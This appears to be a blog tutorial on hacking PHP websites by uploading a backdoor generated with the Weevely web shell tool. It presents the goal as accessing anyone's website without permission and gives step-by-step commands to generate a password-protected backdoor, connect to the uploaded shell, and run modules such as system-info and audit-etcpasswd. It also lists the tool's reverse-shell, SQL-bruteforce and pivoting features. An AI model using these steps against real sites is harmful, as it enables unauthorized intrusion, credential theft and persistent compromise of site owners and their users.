This post is about Website Hacking with the help of backdoor .Today we learn how to hack website using PHP backdoor shell. Weevely is the tool which help to inject backdoor into any PHP website.
We upload file into website such as Doc ,PDF file and picture and you can upload own make PHP page into website ,This tool find weakness into your target if the site is vulnerable you can upload any thing into the website .if we upload malware type thing its harm target website.how to hack website using PHP backdoor shell.
What is backdoor?
In Ethical hacking Hacking and cyber Security World the Backdoor is a method by which attacker access anyone computer ,website etc without their permission ,once attacker successfully upload backdoor in target website ,they created a session into website .
What is Weevely?
weevely is a web based software that provide PHP web shell which upload to a website and backdoor executed.keep in mind it,s work on PHP website ,their is million of website in world that has PHP Back end.
Features:
- Shell access to the target
- SQL console pivoting on the target
- HTTP/HTTPS proxy to browse through the target
- Upload and download files
- Spawn reverse and direct TCP shells
- Audit remote target security
- Port scan pivoting on target
- Mount the remote filesystem
- Bruteforce SQL accounts pivoting on the target
Weevely tool is already installed in Kali Linux Os .if you use other platform use the following command to install
git clone https://github.com/eppina/weevely3
First of all open your Kali machine open terminal and type “weevely”
weevely show us info for help type “weevely –help”
This help show us weevely work in Three mode.
- Generate
- Terminal
- Session
How To Generate Backdoor
Now we generate backdoor for our target website website type the following command
weevely generate [ backdoor password ] [ path and name of backdoor]
Firstly we generate backdoor for target website.
weevely generate 12345 /root/Desktop/backdoor
Finally we generated backdoor successfully ,Due to security issue I am not able to show you practical how to inject backdoor ,i tell you all working command which will used for creating session ,upload the PHP backdoor into your target website ,Lot of website providing upload option .
when we successfully upload the backdoor now its time to execute the backdoor type the following command
weevely [url of target location where is upload ] password of backdoor ]
weevely [url of target location where is upload ] password of backdoor ] Eg: weevely http://192.168.1.109/dvwa/hackable/uploads/hackers-arise-backdoor.php 12345
Its successfully executed as a result our PHP shell open automatically.
Type the “help” command see what weevely can do .
Type the following command one bye one:
- system-info
- audit-etcpasswd
Finally we Upload PHP file into website and Execute this file using weevely tool.
إرسال تعليق